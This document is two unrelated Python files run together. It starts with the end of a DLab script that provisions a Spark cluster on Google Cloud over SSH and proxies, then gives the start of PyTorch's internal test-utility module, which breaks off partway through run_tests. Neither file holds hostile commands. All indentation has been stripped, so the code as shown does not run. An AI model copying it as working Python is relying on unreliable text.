local_log_filepath = "/logs/" + os.environ['conf_resource'] + "/" + local_log_filename
logging.basicConfig(format='%(levelname)-8s [%(asctime)s] %(message)s',
level=logging.INFO,
filename=local_log_filepath)
try:
GCPMeta = dlab.meta_lib.GCPMeta()
GCPActions = dlab.actions_lib.GCPActions()
print('Generating infrastructure names and tags')
data_engine = dict()
data_engine['service_base_name'] = (os.environ['conf_service_base_name'])
data_engine['edge_user_name'] = (os.environ['edge_user_name'])
data_engine['project_name'] = (os.environ['project_name']).replace('_', '-').lower()
data_engine['endpoint_name'] = os.environ['endpoint_name'].replace('_', '-').lower()
data_engine['endpoint_tag'] = data_engine['endpoint_name']
data_engine['region'] = os.environ['gcp_region']
data_engine['zone'] = os.environ['gcp_zone']
try:
if os.environ['gcp_vpc_name'] == '':
raise KeyError
else:
data_engine['vpc_name'] = os.environ['gcp_vpc_name']
except KeyError:
data_engine['vpc_name'] = '{}-vpc'.format(data_engine['service_base_name'])
if 'exploratory_name' in os.environ:
data_engine['exploratory_name'] = os.environ['exploratory_name'].replace('_', '-').lower()
else:
data_engine['exploratory_name'] = ''
if 'computational_name' in os.environ:
data_engine['computational_name'] = os.environ['computational_name'].replace('_', '-').lower()
else:
data_engine['computational_name'] = ''
data_engine['subnet_name'] = '{0}-{1}-{2}-subnet'.format(data_engine['service_base_name'],
data_engine['project_name'],
data_engine['endpoint_name'])
data_engine['master_size'] = os.environ['gcp_dataengine_master_size']
data_engine['slave_size'] = os.environ['gcp_dataengine_slave_size']
data_engine['key_name'] = os.environ['conf_key_name']
data_engine['ssh_key_path'] = '{0}{1}.pem'.format(os.environ['conf_key_dir'], data_engine['key_name'])
data_engine['dataengine_service_account_name'] = '{}-{}-{}-ps-sa'.format(data_engine['service_base_name'],
data_engine['project_name'],
data_engine['endpoint_name'])
if os.environ['conf_os_family'] == 'debian':
initial_user = 'ubuntu'
sudo_group = 'sudo'
if os.environ['conf_os_family'] == 'redhat':
initial_user = 'ec2-user'
sudo_group = 'wheel'
data_engine['cluster_name'] = "{}-{}-{}-de-{}".format(data_engine['service_base_name'],
data_engine['project_name'],
data_engine['endpoint_name'],
data_engine['computational_name'])
data_engine['master_node_name'] = data_engine['cluster_name'] + '-m'
data_engine['slave_node_name'] = data_engine['cluster_name'] + '-s'
data_engine['instance_count'] = int(os.environ['dataengine_instance_count'])
data_engine['notebook_name'] = os.environ['notebook_instance_name']
data_engine['gpu_accelerator_type'] = 'None'
if os.environ['application'] in ('tensor', 'deeplearning'):
data_engine['gpu_accelerator_type'] = os.environ['gcp_gpu_accelerator_type']
data_engine['network_tag'] = '{0}-{1}-{2}-ps'.format(data_engine['service_base_name'],
data_engine['project_name'],
data_engine['endpoint_name'])
master_node_hostname = GCPMeta.get_private_ip_address(data_engine['master_node_name'])
edge_instance_name = '{0}-{1}-{2}-edge'.format(data_engine['service_base_name'],
data_engine['project_name'], data_engine['endpoint_tag'])
edge_instance_hostname = GCPMeta.get_instance_public_ip_by_name(edge_instance_name)
edge_instance_private_ip = GCPMeta.get_private_ip_address(edge_instance_name)
data_engine['dlab_ssh_user'] = os.environ['conf_os_user']
keyfile_name = "{}{}.pem".format(os.environ['conf_key_dir'], os.environ['conf_key_name'])
except Exception as err:
clear_resources()
dlab.fab.append_result("Failed to generate variables dictionary.", str(err))
sys.exit(1)
try:
logging.info('[CREATING DLAB SSH USER ON MASTER NODE]')
print('[CREATING DLAB SSH USER ON MASTER NODE]')
params = "--hostname {} --keyfile {} --initial_user {} --os_user {} --sudo_group {}".format\
(master_node_hostname, os.environ['conf_key_dir'] + data_engine['key_name'] + ".pem", initial_user,
data_engine['dlab_ssh_user'], sudo_group)
try:
local("~/scripts/{}.py {}".format('create_ssh_user', params))
except:
traceback.print_exc()
raise Exception
except Exception as err:
clear_resources()
dlab.fab.append_result("Failed to create ssh user on master.", str(err))
sys.exit(1)
try:
print('[INSTALLING USERs KEY ON MASTER NODE]')
logging.info('[INSTALLING USERs KEY ON MASTER NODE]')
additional_config = {"user_keyname": data_engine['project_name'],
"user_keydir": os.environ['conf_key_dir']}
params = "--hostname {} --keyfile {} --additional_config '{}' --user {}".format(
master_node_hostname, os.environ['conf_key_dir'] + data_engine['key_name'] + ".pem",
json.dumps(additional_config), data_engine['dlab_ssh_user'])
try:
local("~/scripts/{}.py {}".format('install_user_key', params))
except:
dlab.fab.append_result("Failed installing users key")
raise Exception
except Exception as err:
clear_resources()
dlab.fab.append_result("Failed to install ssh user on master.", str(err))
sys.exit(1)
try:
logging.info('[CONFIGURE PROXY ON MASTER NODE]')
print('[CONFIGURE PROXY ON ON MASTER NODE]')
additional_config = {"proxy_host": edge_instance_name, "proxy_port": "3128"}
params = "--hostname {} --instance_name {} --keyfile {} --additional_config '{}' --os_user {}"\
.format(master_node_hostname, data_engine['master_node_name'], keyfile_name, json.dumps(additional_config),
data_engine['dlab_ssh_user'])
try:
local("~/scripts/{}.py {}".format('common_configure_proxy', params))
except:
traceback.print_exc()
raise Exception
except Exception as err:
clear_resources()
dlab.fab.append_result("Failed to configure proxy on master.", str(err))
sys.exit(1)
try:
logging.info('[INSTALLING PREREQUISITES ON MASTER NODE]')
print('[INSTALLING PREREQUISITES ON MASTER NODE]')
params = "--hostname {} --keyfile {} --user {} --region {} --edge_private_ip {}".\
format(master_node_hostname, keyfile_name, data_engine['dlab_ssh_user'], data_engine['region'],
edge_instance_private_ip)
try:
local("~/scripts/{}.py {}".format('install_prerequisites', params))
except:
traceback.print_exc()
raise Exception
except Exception as err:
clear_resources()
dlab.fab.append_result("Failed to install prerequisites on master.", str(err))
sys.exit(1)
try:
logging.info('[CONFIGURE MASTER NODE]')
print('[CONFIGURE MASTER NODE]')
params = "--hostname {} --keyfile {} --region {} --spark_version {} --hadoop_version {} --os_user {} " \
"--scala_version {} --r_mirror {} --master_ip {} --node_type {}".\
format(master_node_hostname, keyfile_name, data_engine['region'], os.environ['notebook_spark_version'],
os.environ['notebook_hadoop_version'], data_engine['dlab_ssh_user'],
os.environ['notebook_scala_version'], os.environ['notebook_r_mirror'], master_node_hostname,
'master')
try:
local("~/scripts/{}.py {}".format('configure_dataengine', params))
except:
traceback.print_exc()
raise Exception
except Exception as err:
dlab.fab.append_result("Failed to configure master node", str(err))
clear_resources()
sys.exit(1)
try:
jobs = []
for slave in range(data_engine['instance_count'] - 1):
p = multiprocessing.Process(target=configure_slave, args=(slave, data_engine))
jobs.append(p)
p.start()
for job in jobs:
job.join()
for job in jobs:
if job.exitcode != 0:
raise Exception
except Exception as err:
dlab.fab.append_result("Failed to configure slave nodes", str(err))
clear_resources()
sys.exit(1)
try:
print('[SETUP EDGE REVERSE PROXY TEMPLATE]')
logging.info('[SETUP EDGE REVERSE PROXY TEMPLATE]')
notebook_instance_ip = GCPMeta.get_private_ip_address(data_engine['notebook_name'])
additional_info = {
"computational_name": data_engine['computational_name'],
"master_node_hostname": master_node_hostname,
"notebook_instance_ip": notebook_instance_ip,
"instance_count": data_engine['instance_count'],
"master_node_name": data_engine['master_node_name'],
"slave_node_name": data_engine['slave_node_name'],
"tensor": False
}
params = "--edge_hostname {} " \
"--keyfile {} " \
"--os_user {} " \
"--type {} " \
"--exploratory_name {} " \
"--additional_info '{}'"\
.format(edge_instance_hostname,
keyfile_name,
data_engine['dlab_ssh_user'],
'spark',
data_engine['exploratory_name'],
json.dumps(additional_info))
try:
local("~/scripts/{}.py {}".format('common_configure_reverse_proxy', params))
except:
dlab.fab.append_result("Failed edge reverse proxy template")
raise Exception
except Exception as err:
dlab.fab.append_result("Failed to configure reverse proxy", str(err))
clear_resources()
sys.exit(1)
try:
ip_address = GCPMeta.get_private_ip_address(data_engine['master_node_name'])
spark_master_url = "http://" + ip_address + ":8080"
spark_master_access_url = "https://" + edge_instance_hostname + "/{}/".format(
data_engine['exploratory_name'] + '_' + data_engine['computational_name'])
logging.info('[SUMMARY]')
print('[SUMMARY]')
print("Service base name: {}".format(data_engine['service_base_name']))
print("Region: {}".format(data_engine['region']))
print("Cluster name: {}".format(data_engine['cluster_name']))
print("Master node shape: {}".format(data_engine['master_size']))
print("Slave node shape: {}".format(data_engine['slave_size']))
print("Instance count: {}".format(str(data_engine['instance_count'])))
with open("/root/result.json", 'w') as result:
res = {"hostname": data_engine['cluster_name'],
"instance_id": data_engine['master_node_name'],
"key_name": data_engine['key_name'],
"Action": "Create new Data Engine",
"computational_url": [
{"description": "Apache Spark Master",
"url": spark_master_access_url},
# {"description": "Apache Spark Master (via tunnel)",
# "url": spark_master_url}
]
}
print(json.dumps(res))
result.write(json.dumps(res))
except Exception as err:
dlab.fab.append_result("Error with writing results", str(err))
clear_resources()
sys.exit(1)
|
common_utils.py | r"""Importing this file must **not** initialize CUDA context. test_distributed
relies on this assumption to properly run. This means that when this is imported
no CUDA calls shall be made, including torch.cuda.device_count(), etc.
torch.testing._internal.common_cuda.py can freely initialize CUDA context when imported.
"""
import sys
import os
import platform
import re
import gc
import types
import math
from functools import partial
import inspect
import io
import copy
import operator
import argparse
import unittest
import warnings
import random
import contextlib
import shutil
import threading
from pathlib import Path
import socket
import subprocess
import time
from collections.abc import Sequence, Mapping
from contextlib import contextmanager, closing
from functools import wraps
from itertools import product
from copy import deepcopy
import tempfile
import json
import __main__ # type: ignore[import]
import errno
import ctypes
from typing import Any, Dict, Iterable, Iterator, Optional, Union, List, Tuple, Type, TypeVar
from unittest.mock import MagicMock
import numpy as np
import expecttest
from torch.testing._comparison import (
assert_equal as assert_equal,
Pair,
TensorLikePair,
BooleanPair,
NumberPair,
UnsupportedInputs,
NonePair,
ErrorMeta,
)
import torch
import torch.cuda
from torch.testing import make_tensor
from torch._utils_internal import get_writable_path
from torch._six import string_classes
from torch import Tensor
import torch.backends.cudnn
import torch.backends.mkl
import torch.backends.xnnpack
from enum import Enum
from statistics import mean
import functools
from .composite_compliance import no_dispatch
from torch.testing._internal.common_dtype import get_all_dtypes
from torch.nn import ModuleList, ModuleDict, Sequential, ParameterList, ParameterDict
from torch._C import ScriptList, ScriptDict # type: ignore[attr-defined]
from torch.onnx import (register_custom_op_symbolic,
unregister_custom_op_symbolic)
torch.backends.disable_global_flags()
FILE_SCHEMA = "file://"
if sys.platform == 'win32':
FILE_SCHEMA = "file:///"
# Environment variable `IN_CI` is set in `.jenkins/common.sh`.
IS_IN_CI = os.getenv('IN_CI') == '1'
IS_SANDCASTLE = os.getenv('SANDCASTLE') == '1' or os.getenv('TW_JOB_USER') == 'sandcastle'
IS_FBCODE = os.getenv('PYTORCH_TEST_FBCODE') == '1'
IS_REMOTE_GPU = os.getenv('PYTORCH_TEST_REMOTE_GPU') == '1'
RETRY_TEST_CASES = os.getenv('PYTORCH_RETRY_TEST_CASES') == '1'
OVERRIDE_FLAKY_SIGNAL = os.getenv('PYTORCH_OVERRIDE_FLAKY_SIGNAL') == '1'
MAX_NUM_RETRIES = 3
DISABLED_TESTS_FILE = '.pytorch-disabled-tests.json'
SLOW_TESTS_FILE = '.pytorch-slow-tests.json'
slow_tests_dict: Optional[Dict[str, Any]] = None
disabled_tests_dict: Optional[Dict[str, Any]] = None
NATIVE_DEVICES = ('cpu', 'cuda', 'meta')
class _TestParametrizer(object):
"""
Decorator class for parametrizing a test function, yielding a set of new tests spawned
from the original generic test, each specialized for a specific set of test inputs. For
example, parametrizing a test across the set of ops will result in a test function per op.
The decision of how to parametrize / what to parametrize over is intended to be implemented
by each derived class.
In the details, the decorator adds a 'parametrize_fn' property to the test function that is called
during device-specific test instantiation performed in instantiate_device_type_tests(). Because of this,
there is no need to parametrize over device type, as that is already handled separately.
If the decorator is applied to a test function that already has a 'parametrize_fn' property, a new
composite 'parametrize_fn' will be created that generates tests with the product of the parameters
generated by the old and new parametrize_fns. This allows for convenient composability of decorators.
"""
def _parametrize_test(self, test, generic_cls, device_cls):
"""
Parametrizes the given test function across whatever dimension is specified by the derived class.
Tests can be parametrized over any arbitrary dimension or combination of dimensions, such as all
ops, all modules, or all ops + their associated dtypes.
Args:
test (fn): Test function to parametrize over
generic_cls (class): Generic test class object containing tests (e.g. TestFoo)
device_cls (class): Device-specialized test class object (e.g. TestFooCPU); set to None
if the tests are not part of a device-specific set
Returns:
Generator object returning 3-tuples of:
test (fn): Parametrized test function; must support a device arg and args for any params
test_name (str): Parametrized suffix for the test (e.g. opname_int64); will be appended to
the base name of the test
param_kwargs (dict): Param kwargs to pass to the test (e.g. {'op': 'add', 'dtype': torch.int64})
"""
raise NotImplementedError
def __call__(self, fn):
if hasattr(fn, 'parametrize_fn'):
# Do composition with the product of args.
old_parametrize_fn = fn.parametrize_fn
new_parametrize_fn = self._parametrize_test
fn.parametrize_fn = compose_parametrize_fns(old_parametrize_fn, new_parametrize_fn)
else:
fn.parametrize_fn = self._parametrize_test
return fn
def compose_parametrize_fns(old_parametrize_fn, new_parametrize_fn):
"""
Returns a parametrize_fn that parametrizes over the product of the parameters handled
by the given parametrize_fns. Each given parametrize_fn should each have the signature
f(test, generic_cls, device_cls).
The test names will be a combination of the names produced by the parametrize_fns in
"<new_name>_<old_name>" order. This order is done to match intuition for constructed names
when composing multiple decorators; the names will be built in top to bottom order when stacking
parametrization decorators.
Args:
old_parametrize_fn (callable) - First parametrize_fn to compose.
new_parametrize_fn (callable) - Second parametrize_fn to compose.
"""
def composite_fn(test, generic_cls, device_cls,
old_parametrize_fn=old_parametrize_fn,
new_parametrize_fn=new_parametrize_fn):
old_tests = [(test, test_name, param_kwargs) for (test, test_name, param_kwargs) in
old_parametrize_fn(test, generic_cls, device_cls)]
for (old_test, old_test_name, old_param_kwargs) in old_tests:
for (new_test, new_test_name, new_param_kwargs) in \
new_parametrize_fn(old_test, generic_cls, device_cls):
redundant_params = set(old_param_kwargs.keys()).intersection(new_param_kwargs.keys())
if redundant_params:
raise RuntimeError('Parametrization over the same parameter by multiple parametrization '
'decorators is not supported. For test "{}", the following parameters '
'are handled multiple times: {}'.format(
test.__name__, redundant_params))
full_param_kwargs = {**old_param_kwargs, **new_param_kwargs}
merged_test_name = '{}{}{}'.format(new_test_name,
'_' if old_test_name != '' and new_test_name != '' else '',
old_test_name)
yield (new_test, merged_test_name, full_param_kwargs)
return composite_fn
def instantiate_parametrized_tests(generic_cls):
"""
Instantiates tests that have been decorated with a parametrize_fn. This is generally performed by a
decorator subclass of _TestParametrizer. The generic test will be replaced on the test class by
parametrized tests with specialized names.
Args:
generic_cls (class): Generic test class object containing tests (e.g. TestFoo)
"""
for attr_name in tuple(dir(generic_cls)):
class_attr = getattr(generic_cls, attr_name)
if not hasattr(class_attr, 'parametrize_fn'):
continue
# Remove the generic test from the test class.
delattr(generic_cls, attr_name)
# Add parametrized tests to the test class.
def instantiate_test_helper(cls, name, test, param_kwargs):
@wraps(test)
def instantiated_test(self, param_kwargs=param_kwargs):
test(self, **param_kwargs)
assert not hasattr(generic_cls, name), "Redefinition of test {0}".format(name)
setattr(generic_cls, name, instantiated_test)
for (test, test_suffix, param_kwargs) in class_attr.parametrize_fn(
class_attr, generic_cls=generic_cls, device_cls=None):
full_name = '{}_{}'.format(test.__name__, test_suffix)
instantiate_test_helper(cls=generic_cls, name=full_name, test=test, param_kwargs=param_kwargs)
class subtest(object):
"""
Explicit subtest case for use with test parametrization.
Allows for explicit naming of individual subtest cases as well as applying
decorators to the parametrized test.
Args:
arg_values (iterable): Iterable of arg values (e.g. range(10)) or
tuples of arg values (e.g. [(1, 2), (3, 4)]).
name (str): Optional name to use for the test.
decorators (iterable): Iterable of decorators to apply to the generated test.
"""
__slots__ = ['arg_values', 'name', 'decorators']
def __init__(self, arg_values, name=None, decorators=None):
self.arg_values = arg_values
self.name = name
self.decorators = decorators if decorators else []
class parametrize(_TestParametrizer):
"""
Decorator for applying generic test parametrizations.
The interface for this decorator is modeled after `@pytest.mark.parametrize`.
Basic usage between this decorator and pytest's is identical. The first argument
should be a string containing comma-separated names of parameters for the test, and
the second argument should be an iterable returning values or tuples of values for
the case of multiple parameters.
Beyond this basic usage, the decorator provides some additional functionality that
pytest does not.
1. Parametrized tests end up as generated test functions on unittest test classes.
Since this differs from how pytest works, this decorator takes on the additional
responsibility of naming these test functions. The default test names consists of
the test's base name followed by each parameter name + value (e.g. "test_bar_x_1_y_foo"),
but custom names can be defined using `name_fn` or the `subtest` structure (see below).
2. The decorator specially handles parameter values of type `subtest`, which allows for
more fine-grained control over both test naming and test execution. In particular, it can
be used to tag subtests with explicit test names or apply arbitrary decorators (see examples
below).
Examples::
@parametrize("x", range(5))
def test_foo(self, x):
...
@parametrize("x,y", [(1, 'foo'), (2, 'bar'), (3, 'baz')])
def test_bar(self, x, y):
...
@parametrize("x,y", [(1, 'foo'), (2, 'bar'), (3, 'baz')],
name_fn=lambda x, y: '{}_{}'.format(x, y))
def test_bar_custom_names(self, x, y):
...
@parametrize("x, y", [subtest((1, 2), name='double'),
subtest((1, 3), name='triple', decorators=[unittest.expectedFailure]),
subtest((1, 4), name='quadruple')])
def test_baz(self, x, y):
...
Args:
arg_str (str): String of arg names separate by commas (e.g. "x,y").
arg_values (iterable): Iterable of arg values (e.g. range(10)) or
tuples of arg values (e.g. [(1, 2), (3, 4)]).
name_fn (callable): Optional function that takes in parameters and returns subtest name.
"""
def __init__(self, arg_str, arg_values, name_fn=None):
self.arg_names = arg_str.split(',')
self.arg_values = arg_values
self.name_fn = name_fn
def _formatted_str_repr(self, name, value):
""" Returns a string representation for the given arg that is suitable for use in test function names. """
if isinstance(value, torch.dtype):
return dtype_name(value)
elif isinstance(value, torch.device):
return str(value)
# Can't use isinstance as it would cause a circular import
elif value.__class__.__name__ == 'OpInfo' or value.__class__.__name__ == 'ModuleInfo':
return value.formatted_name
else:
# Include name and value separated by underscore.
return '{}_{}'.format(name, str(value).replace('.', '_'))
def _default_subtest_name(self, values):
return '_'.join([self._formatted_str_repr(a, v) for a, v in zip(self.arg_names, values)])
def _get_subtest_name(self, values, explicit_name=None):
if explicit_name:
subtest_name = explicit_name
elif self.name_fn:
subtest_name = self.name_fn(*values)
else:
subtest_name = self._default_subtest_name(values)
return subtest_name
def _parametrize_test(self, test, generic_cls, device_cls):
if len(self.arg_names) == 0:
# No additional parameters needed for the test.
test_name = ''
yield (test, test_name, {})
else:
# Each "values" item is expected to be either:
# * A tuple of values with one for each arg. For a single arg, a single item is expected.
# * A subtest instance with arg_values matching the previous.
for values in self.arg_values:
maybe_name = None
if isinstance(values, subtest):
sub = values
values = sub.arg_values
maybe_name = sub.name
# Apply decorators.
@wraps(test)
def test_wrapper(*args, **kwargs):
return test(*args, **kwargs)
for decorator in sub.decorators:
test_wrapper = decorator(test_wrapper)
gen_test = test_wrapper
else:
gen_test = test
values = list(values) if len(self.arg_names) > 1 else [values]
if len(values) != len(self.arg_names):
raise RuntimeError('Expected # values == # arg names, but got: {} '
'values and {} names for test "{}"'.format(
len(values), len(self.arg_names), test.__name__))
param_kwargs = {
name: value for name, value in zip(self.arg_names, values)
}
test_name = self._get_subtest_name(values, explicit_name=maybe_name)
if '.' in test_name:
raise RuntimeError('Test name cannot contain periods, but got: {}'.format(test_name))
yield (gen_test, test_name, param_kwargs)
class ProfilingMode(Enum):
LEGACY = 1
SIMPLE = 2
PROFILING = 3
def cppProfilingFlagsToProfilingMode():
old_prof_exec_state = torch._C._jit_set_profiling_executor(True)
old_prof_mode_state = torch._C._get_graph_executor_optimize(True)
torch._C._jit_set_profiling_executor(old_prof_exec_state)
torch._C._get_graph_executor_optimize(old_prof_mode_state)
if old_prof_exec_state:
if old_prof_mode_state:
return ProfilingMode.PROFILING
else:
return ProfilingMode.SIMPLE
else:
return ProfilingMode.LEGACY
@contextmanager
def enable_profiling_mode_for_profiling_tests():
if GRAPH_EXECUTOR == ProfilingMode.PROFILING:
old_prof_exec_state = torch._C._jit_set_profiling_executor(True)
old_prof_mode_state = torch._C._get_graph_executor_optimize(True)
try:
yield
finally:
if GRAPH_EXECUTOR == ProfilingMode.PROFILING:
torch._C._jit_set_profiling_executor(old_prof_exec_state)
torch._C._get_graph_executor_optimize(old_prof_mode_state)
@contextmanager
def enable_profiling_mode():
old_prof_exec_state = torch._C._jit_set_profiling_executor(True)
old_prof_mode_state = torch._C._get_graph_executor_optimize(True)
try:
yield
finally:
torch._C._jit_set_profiling_executor(old_prof_exec_state)
torch._C._get_graph_executor_optimize(old_prof_mode_state)
@contextmanager
def num_profiled_runs(num_runs):
old_num_runs = torch._C._jit_set_num_profiled_runs(num_runs)
try:
yield
finally:
torch._C._jit_set_num_profiled_runs(old_num_runs)
func_call = torch._C.ScriptFunction.__call__
meth_call = torch._C.ScriptMethod.__call__
def prof_callable(callable, *args, **kwargs):
if 'profile_and_replay' in kwargs:
del kwargs['profile_and_replay']
if GRAPH_EXECUTOR == ProfilingMode.PROFILING:
with enable_profiling_mode_for_profiling_tests():
callable(*args, **kwargs)
return callable(*args, **kwargs)
return callable(*args, **kwargs)
def prof_func_call(*args, **kwargs):
return prof_callable(func_call, *args, **kwargs)
def prof_meth_call(*args, **kwargs):
return prof_callable(meth_call, *args, **kwargs)
# TODO fix when https://github.com/python/mypy/issues/2427 is address
torch._C.ScriptFunction.__call__ = prof_func_call # type: ignore[assignment]
torch._C.ScriptMethod.__call__ = prof_meth_call # type: ignore[assignment]
def _get_test_report_path():
# allow users to override the test file location. We need this
# because the distributed tests run the same test file multiple
# times with different configurations.
override = os.environ.get('TEST_REPORT_SOURCE_OVERRIDE')
test_source = override if override is not None else 'python-unittest'
return os.path.join('test-reports', test_source)
is_running_via_run_test = "run_test.py" in getattr(__main__, "__file__", "")
parser = argparse.ArgumentParser(add_help=not is_running_via_run_test)
parser.add_argument('--subprocess', action='store_true',
help='whether to run each test in a subprocess')
parser.add_argument('--seed', type=int, default=1234)
parser.add_argument('--accept', action='store_true')
parser.add_argument('--jit_executor', type=str)
parser.add_argument('--repeat', type=int, default=1)
parser.add_argument('--test_bailouts', action='store_true')
parser.add_argument('--save-xml', nargs='?', type=str,
const=_get_test_report_path(),
default=_get_test_report_path() if IS_IN_CI else None)
parser.add_argument('--discover-tests', action='store_true')
parser.add_argument('--log-suffix', type=str, default="")
parser.add_argument('--run-parallel', type=int, default=1)
parser.add_argument('--import-slow-tests', type=str, nargs='?', const=SLOW_TESTS_FILE)
parser.add_argument('--import-disabled-tests', type=str, nargs='?', const=DISABLED_TESTS_FILE)
# Only run when -h or --help flag is active to display both unittest and parser help messages.
def run_unittest_help(argv):
unittest.main(argv=argv)
if '-h' in sys.argv or '--help' in sys.argv:
help_thread = threading.Thread(target=run_unittest_help, args=(sys.argv,))
help_thread.start()
help_thread.join()
args, remaining = parser.parse_known_args()
if args.jit_executor == 'legacy':
GRAPH_EXECUTOR = ProfilingMode.LEGACY
elif args.jit_executor == 'profiling':
GRAPH_EXECUTOR = ProfilingMode.PROFILING
elif args.jit_executor == 'simple':
GRAPH_EXECUTOR = ProfilingMode.SIMPLE
else:
# infer flags based on the default settings
GRAPH_EXECUTOR = cppProfilingFlagsToProfilingMode()
IMPORT_SLOW_TESTS = args.import_slow_tests
IMPORT_DISABLED_TESTS = args.import_disabled_tests
LOG_SUFFIX = args.log_suffix
RUN_PARALLEL = args.run_parallel
TEST_BAILOUTS = args.test_bailouts
TEST_DISCOVER = args.discover_tests
TEST_IN_SUBPROCESS = args.subprocess
TEST_SAVE_XML = args.save_xml
REPEAT_COUNT = args.repeat
SEED = args.seed
if not expecttest.ACCEPT:
expecttest.ACCEPT = args.accept
UNITTEST_ARGS = [sys.argv[0]] + remaining
torch.manual_seed(SEED)
# CI Prefix path used only on CI environment
CI_TEST_PREFIX = str(Path(os.getcwd()))
def wait_for_process(p):
try:
return p.wait()
except KeyboardInterrupt:
# Give `p` a chance to handle KeyboardInterrupt. Without this,
# `pytest` can't print errors it collected so far upon KeyboardInterrupt.
exit_status = p.wait(timeout=5)
if exit_status is not None:
return exit_status
else:
p.kill()
raise
except: # noqa: B001,E722, copied from python core library
p.kill()
raise
finally:
# Always call p.wait() to ensure exit
p.wait()
def shell(command, cwd=None, env=None):
sys.stdout.flush()
sys.stderr.flush()
# The following cool snippet is copied from Py3 core library subprocess.call
# only the with
# 1. `except KeyboardInterrupt` block added for SIGINT handling.
# 2. In Py2, subprocess.Popen doesn't return a context manager, so we do
# `p.wait()` in a `final` block for the code to be portable.
#
# https://github.com/python/cpython/blob/71b6c1af727fbe13525fb734568057d78cea33f3/Lib/subprocess.py#L309-L323
assert not isinstance(command, torch._six.string_classes), "Command to shell should be a list or tuple of tokens"
p = subprocess.Popen(command, universal_newlines=True, cwd=cwd, env=env)
return wait_for_process(p)
def discover_test_cases_recursively(suite_or_case):
if isinstance(suite_or_case, unittest.TestCase):
return [suite_or_case]
rc = []
for element in suite_or_case:
print(element)
rc.extend(discover_test_cases_recursively(element))
return rc
def get_test_names(test_cases):
return ['.'.join(case.id().split('.')[-2:]) for case in test_cases]
def _print_test_names():
suite = unittest.TestLoader().loadTestsFromModule(__main__)
test_cases = discover_test_cases_recursively(suite)
for name in get_test_names(test_cases):
print(name)
def chunk_list(lst, nchunks):
return [lst[i::nchunks] for i in range(nchunks)]
# sanitize filename e.g., distributed/pipeline/sync/skip/test_api.py -> distributed.pipeline.sync.skip.test_api
def sanitize_test_filename(filename):
# inspect.getfile returns absolute path in some CI jobs, converting it to relative path if needed
if filename.startswith(CI_TEST_PREFIX):
filename = filename[len(CI_TEST_PREFIX) + 1:]
strip_py = re.sub(r'.py$', '', filename)
return re.sub('/', r'.', strip_py)
def lint_test_case_extension(suite):
succeed = True
for test_case_or_suite in suite:
test_case = test_case_or_suite
if isinstance(test_case_or_suite, unittest.TestSuite):
first_test = test_case_or_suite._tests[0] if len(test_case_or_suite._tests) > 0 else None
if first_test is not None and isinstance(first_test, unittest.TestSuite):
return succeed and lint_test_case_extension(test_case_or_suite)
test_case = first_test
if test_case is not None:
test_class = test_case.id().split('.', 1)[1].split('.')[0]
if not isinstance(test_case, TestCase):
err = "This test class should extend from torch.testing._internal.common_utils.TestCase but it doesn't."
print(f"{test_class} - failed. {err}")
succeed = False
return succeed
def run_tests(argv=UNITTEST_ARGS):
# import test files.
if IMPORT_SLOW_TESTS:
if os.path.exists(IMPORT_SLOW_TESTS):
global slow_tests_dict
with open(IMPORT_SLOW_TESTS, 'r') as fp:
slow_tests_dict = json.load(fp)
else:
print(f'[WARNING] slow test file provided but not found: {IMPORT_SLOW_TESTS}')
if IMPORT_DISABLED_TESTS:
if os.path.exists(IMPORT_DISABLED_TESTS):
global disabled_tests_dict
with open(IMPORT_DISABLED_TESTS, 'r') as fp:
disabled_tests_dict = json.load(fp)
else:
print(f'[WARNING] disabled test file provided but not found: {IMPORT_DISABLED_TESTS}')
# Determine the test launch mechanism
if TEST_DISCOVER:
_print_test_names()
return
# Before running the tests, lint to check that every test class extends from TestCase
suite = unittest.TestLoader().loadTestsFromModule(__main__)
if not lint_test_case_extension(suite):
sys.exit(1)
if TEST_IN_SUBPROCESS:
failed_tests = []
test_cases = discover_test_cases_recursively(suite)
for case in test_cases:
test_case_full_name = case.id().split('.', 1)[1]
other_args = []
if IMPORT_DISABLED_TESTS:
other_args.append('--import-disabled-tests')
if IMPORT_SLOW_TESTS:
other_args.append('--import-slow-tests')
cmd = [sys.executable] + [argv[0]] + other_args + argv[1:] + [test_case_full_name]
string_cmd = " ".join(cmd)
exitcode = shell(cmd)
if exitcode != 0:
# This is sort of hacky, but add on relevant env variables for distributed tests.
if 'TestDistBackendWithSpawn' in test_case_full_name:
backend = os.environ.get("BACKEND", "")
world_size = os.environ.get("WORLD_SIZE", "")
env_prefix = f"BACKEND={backend} WORLD_SIZE={world_size}"
string_cmd = env_prefix + " " + string_cmd
# Log the command to reproduce the failure.
print(f"Test exited with non-zero exitcode {exitcode}. Command to reproduce: {string_cmd}")
failed_tests.append(test_case_full_name)
assert len(failed_tests) == 0, "{} unit test(s) failed:\n\t{}".format(
len(failed_tests), '\n\t'.join(failed_tests))
elif RUN_PARALLEL > 1:
test_cases = discover_test_cases_recursively(suite)
test_batches = chunk_list(get_test_names(test_cases), RUN_PARALLEL)
processes = []
for i in range(RUN_PARALLEL):
command = [sys.executable] + argv + ['--log-suffix=-shard-{}'.format(i + 1)] + test_batches[i]
processes.append(subprocess.Popen(command, universal_newlines=True))
failed = False
for p in processes:
failed |= wait_for_process(p) != 0
assert not failed, "Some test shards have failed"
elif TEST_SAVE_XML is not None:
# import here so that non-CI doesn't need xmlrunner installed
import xmlrunner # type: ignore[import]
from xmlrunner.result import _XMLTestResult # type: ignore[import]
class XMLTestResultVerbose(_XMLTestResult):
"""
Adding verbosity to test outputs:
by default test summary prints 'skip',
but we want to also print the skip reason.
GH issue: https://github.com/pytorch/pytorch/issues/69014
This works with unittest_xml_reporting<=3.2.0,>=2.0.0
(3.2.0 is latest at the moment)
"""
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
def addSkip(self, test, reason):
super().addSkip(test, reason)
for c in self.callback.__closure__:
if isinstance(c.cell_contents, str) and c.cell_contents == 'skip':
# this message is printed in test summary;
# it stands for `verbose_str` captured in the closure
c.cell_contents = f"skip: {reason}"
test_filename = sanitize_test_filename(inspect.getfile(sys._getframe(1)))
test_report_path = TEST_SAVE_XML + LOG_SUFFIX
test_report_path = os.path.join(test_report_path, test_filename)
os.makedirs(test_report_path, exist_ok=True)
verbose = '--verbose' in argv or '-v' in argv
if verbose:
print('Test results will be stored in {}'.format(test_report_path))
unittest.main(argv=argv, testRunner=xmlrunner.XMLTestRunner(
output=test_report_path,
verbosity=2 if verbose else 1,
resultclass=XMLTestResultVerbose))
elif REPEAT_COUNT > 1:
for _ in range(REPEAT_COUNT):
if not unittest.main(exit=False, argv=argv).result.wasSuccessful():
sys.exit(-1)
else:
